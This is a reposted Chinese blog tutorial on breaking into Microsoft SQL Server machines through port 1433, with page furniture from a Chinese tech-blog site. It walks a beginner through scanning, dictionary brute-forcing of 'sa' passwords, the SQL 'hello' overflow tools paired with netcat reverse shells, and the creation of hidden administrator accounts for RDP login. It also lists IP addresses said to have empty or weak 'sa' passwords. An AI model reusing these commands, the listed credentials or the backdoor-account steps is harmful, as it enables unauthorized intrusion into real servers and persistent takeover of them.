【转】1433端口入侵详解

scanport.exe 查有1433的机器

  SQLScanPass.exe 进行字典暴破(字典是关键)

  最后 SQLTools.exe入侵

  对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

  (以上反向的,测试成功)

  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)


久违的溢出工具

  用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

  通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

  先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了, 看来是成功溢出了,就这么简单。

  我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符 下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。


218.5.135.66     SQL-Server弱口令: "sa/1234"
218.14.115.111   SQL-Server弱口令: "sa/[空口令]"
218.12.38.52     SQL-Server弱口令: "sa/[空口令]"
218.12.97.14     SQL-Server弱口令: "sa/[空口令]"
218.6.242.228    SQL-Server弱口令: "sa/[空口令]"
222.100.119.3    SQL-Server弱口令: "sa/[空口令]"
222.105.67.200   SQL-Server弱口令: "sa/[空口令]"
222.105.28.130   SQL-Server弱口令: "sa/[空口令]"
222.106.60.51    SQL-Server弱口令: "sa/[空口令]"
222.117.107.1    SQL-Server弱口令: "sa/[空口令]"

在win2000机器上装了mssql的话,机器就会开1433端口。什么 什么是端口?就象食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433端口。溢出1433需要两个工具 nc.exe和sql2.exe。进攻方法就两步,在自己机器上开一个cmd窗口。对了,你要用win2000的话就在开始-运行-键入cmd回车就成了 饿。这里我们只用2000不说98。如果你把你的下的nc.exe和sql2.exe放在C:盘的话,就在你开的这个窗口打入命令c:>nc -1 -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:> sql2.exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是说下吧,在cmd下键入ipconfig就可以了。其中命令行中的40你可以随便改成别的,但好象40 和53的成功率高一点。再是命令中的0不性的话,你就试试1或2。如果入侵网站有这个漏洞的话,那么你开的第一个窗口就会边成肉鸡的c:>winnt\ system32>.就是说,你已经进入它的机器里了。进去以后,你可以添加个拥护了。net user guest /active:yes用这个命令,就将默认禁止的guest拥护激火。net user guest 123456这样guest的密码变成了123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

呵呵,基本就是这样了,,,,

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/11411056/viewspace-734406/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/11411056/viewspace-734406/

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值